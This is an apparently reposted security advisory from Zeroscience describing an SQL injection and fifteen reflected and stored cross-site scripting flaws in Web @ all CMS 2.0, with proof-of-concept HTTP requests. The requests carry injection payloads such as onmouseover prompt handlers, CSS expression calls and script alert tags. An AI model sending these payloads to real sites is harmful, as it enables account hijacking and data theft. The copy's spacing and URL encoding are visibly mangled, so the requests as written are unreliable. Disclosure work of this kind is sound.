Web @ all CMS 2.0 multiple defects and repair

Web @ all CMS 2.0 (_ order) SQL Injection Vulnerability
 
Developer: web @ all
 
Official Website: http://www.webatall.org
 
Affected Versions: 2.0
 

 
Summary: web @ all is a PHP content management system (CMS). If you
 
Know about it, you nearly can use it to do anything.
 

 
Desc: The application suffers from an SQL Injection vulnerability.
 
Input passed via the GET parameter '_ order' is not properly sanitised
 
Before being returned to the user or used in SQL queries. This can be
 
Exploited to manipulate SQL queries by injecting arbitrary SQL code.
 

 
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
 
Apache 2.4.2 (Win32)
 
PHP 5.4.4
 
MySQL 5.5.25a
 

 

 
Vulnerability discovered by Gjoko 'liquidworm' Krstic
 
@ Zeroscience
 

 

 
Advisory ID: ZSL-2012-5099
 
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5099.php
 

 

 
21.08.2012
 

 
---
 

 

 
Http://www.2cto.com/webatall/sys/index. php? _ Key = author & _ order = 1 [SQL ATTACK QUERY] & _ text [status] =-1 & _ type [] = 0 & mod = article
 

 
========================================================== ============================================
 

 
Web @ all CMS 2.0 Multiple Remote XSS Vulnerabilities
 

 

 
Vendor: web @ all
 
Product web page: http://www.webatall.org
 
Affected version: 2.0
 

 
Summary: web @ all is a PHP content management system (CMS). If you
 
Know about it, you nearly can use it to do anything.
 

 
Desc: web @ all CMS suffers from multiple stored and reflected cross-site
 
Scripting vulnerabilities. The issues are triggered when input passed
 
Several parameters to several scripts is not properly sanitized before being
 
Returned to the user. This can be exploited to execute arbitrary HTML and
 
Script code in a user's browser session in context of an affected site.
 

 
----------------------------------------------------------------------------
 
* Parameter ** Method ** Module ** Type *
 
----------------------------------------------------------------------------
 

 
1. act POST member Reflected
 
2. security POST member Reflected
 
3. username POST member Reflected
 
4. id GET article Reflected
 
5. mod GET/POST member Reflected
 
6. _ flag GET article Reflected
 
7. _ text [] GET article Reflected
 
8. _ text [alias] GET article Reflected
 
9. _ text [category] GET article Reflected
 
10. _ text [email] GET member Reflected
 
11. _ text [title] GET article Reflected
 
12. _ text [username] GET article Reflected
 
13. _ text [timeadd] GET member Reflected
 
14. title POST article/cron Stored
 
15. description POST cron Stored
 

 
----------------------------------------------------------------------------
 

 
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
 
Apache 2.4.2 (Win32)
 
PHP 5.4.4
 
MySQL 5.5.25a
 

 

 
Vulnerability discovered by Gjoko 'liquidworm' Krstic
 
@ Zeroscience
 

 

 
Advisory ID: ZSL-2012-5098
 
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5098.php
 

 

 
21.08.2012
 

 
---
 

 

 
Reflected:
 
----------
 

 

 
POST/webatall/sys/action. php http/ 1.1
 
Content-Length: 154
 
Content-Type: application/x-www-form-urlencoded
 
Cookie: guest = A0; _ WA: auth = 1; auth = 2834d02f4b8925b021232f297a57a5a743894a0e4a801fc31
 
Host: localhost: 80
 
Connection: Keep-alive
 
Accept-Encoding: gzip, deflate
 
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
 

 
Act = 1% 3 cdiv % 20 style % 3 dwidth % 3 aexpression % 28 prompt % 28900164% 29% 29% 3e & goto = % 2 fsys & mod = member & password = Password & security = 1 & amp; submit = Sign % 20in & amp; username = Username
 

 

 
POST/webatall/sys/action. php http/ 1.1
 
Content-Length: 154
 
Content-Type: application/x-www-form-urlencoded
 
Cookie: guest = A0; _ WA: auth = 1; auth = 2834d02f4b8925b021232f297a57a5a743894a0e4a801fc31
 
Host: localhost: 80
 
Connection: Keep-alive
 
Accept-Encoding: gzip, deflate
 
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
 

 
Act = signin & goto = % 2 fsys & mod = 1% 3 cdiv % 20 style % 3 dwidth % 3 aexpression % 28 prompt % 28920000% 29% 3e & password = Password & security = 1 & amp; submit = Sign % 20in & amp; username = Username
 

 

 
POST/webatall/sys/action. php http/ 1.1
 
Content-Length: 159
 
Content-Type: application/x-www-form-urlencoded
 
Cookie: guest = A0; _ WA: auth = 1; auth = 2834d02f4b8925b021232f297a57a5a743894a0e4a801fc31
 
Host: localhost: 80
 
Connection: Keep-alive
 
Accept-Encoding: gzip, deflate
 
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
 

 
Act = signin & goto = % 2 fsys & mod = member & password = Password & security = 1% 3 cdiv % 20 style % 3 dwidth % 3 aexpression % 28 prompt % 28964492% 29% 3e & amp; submit = Sign % 20in & amp; username = Username
 

 

 
POST/webatall/sys/action. php http/ 1.1
 
Content-Length: 147
 
Content-Type: application/x-www-form-urlencoded
 
Cookie: guest = A0; _ WA: auth = 1; auth = 2834d02f4b8925b021232f297a57a5a743894a0e4a801fc31
 
Host: localhost: 80
 
Connection: Keep-alive
 
Accept-Encoding: gzip, deflate
 
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
 

 
Act = signin & goto = % 2 fsys & mod = member & password = admin & security = 1 & submit = Sign + in & username = 1% 3 cdiv % 20 style % 3 dwidth % 3 aexpression % 28 prompt % 28913398% 29% 3e
 

 

 
GET/webatall/sys/index. php? _ Flag = & _ key = title & _ order = & _ text % 5b % 5d = & _ text % 5 bcategory % 5d = & _ text % 5 bstatus % 5d =-1 & _ type % 5b % 5d = 0 & id = % 22% 20 onmouseover % 3 dprompt % 28940245% 29% 20bad % 3d % 22 & mod = article
 
GET/webatall/sys/index. php? _ Text [timeadd] = 1345564800 & _ type [timeadd] = 2 & mod = 1% 3 cdiv % 20 style % 3 dwidth % 3 aexpression % 28 prompt % 28961358% 29% 3e
 
GET/webatall/sys/index. php? _ Flag = % 22% 20 onmouseover % 3 dprompt % 28916116% 29% 20bad % 3d % 22 & _ key = title & _ order = & _ text % 5b % 5d = & _ text % 5 bcategory % 5d = & _ text % 5 bstatus % 5d =-1 & _ type % 5b % 5d = 0 & id = & mod = article
 
GET/webatall/sys/index. php? _ Flag = & _ key = title & _ order = & _ text % 5b % 5d = % 22% 20 onmouseover % 3 dprompt % 28965775% 29% 20bad % 3d % 22 & _ text % 5 bcategory % 5d = & _ text % 5 bstatus % 5d =-1 & _ type % 5b % 5d = 0 & id = & mod = article
 
GET/webatall/sys/index. php? _ Text % 5 balias % 5d = % 22% 20 onmouseover % 3 dprompt % 28989568% 29% 20bad % 3d % 22 & _ type % 5 balias % 5d = 0 & mod = article
 
GET/webatall/sys/index. php? _ Flag = & _ key = title & _ order = & _ text % 5b % 5d = & _ text % 5 bcategory % 5d = % 22% 20 onmouseover % 3 dprompt % 28926119% 29% 20bad % 3d % 22 & _ text % 5 bstatus % 5d =-1 & _ type % 5b % 5d = 0 & id = & mod = article
 
GET/webatall/sys/index. php? _ Text % 5 bemail % 5d = % 22% 20 onmouseover % 3 dprompt % 28999602% 29% 20bad % 3d % 22 & _ type % 5 bemail % 5d = 0 & mod = member
 
GET/webatall/sys/index. php? _ Text % 5 btitle % 5d = % 22% 20 onmouseover % 3 dprompt % 28927731% 29% 20bad % 3d % 22 & _ type % 5 btitle % 5d = 0 & mod = article
 
GET/webatall/sys/index. php? _ Text % 5 busername % 5d = % 22% 20 onmouseover % 3 dprompt % 28926119% 29% 20bad % 3d % 22 & _ type % 5 busername % 5d = 0 & mod = member
 
GET/webatall/sys/index. php? _ Text [timeadd] = % 22% 20 onmouseover % 3 dprompt % 28929079% 29% 20bad % 3d % 22 & _ type [timeadd] = 2 & mod = member
 

 

 

 
Stored:
 
-------
 

 

 
POST http://www.2cto.com/webatall/sys/action. php HTTP/1.1
 

 
Act sys_add
 
Author test
 
Category_id 1
 
Content test
 
Content_key test
 
Copyright test
 
Files
 
Id
 
Lang
 
Menu
 
Meta_description test
 
Meta_keywords test
 
Mod article
 
Options test
 
Status 1
 
Thumbs test
 
Title "> <script> alert (1); </script>
 

 

 

 
POST http: // localhost/webatall/sys/action. php HTTP/1.1
 

 
Act sys_add
 
Cron delete_unpaid_transaction.php
 
Description "> <script> alert (2); </script>
 
Id
 
Menu
 
Mod cron
 
Run_interval
 
Status 1
 
Title "> <script> alert (3); </script>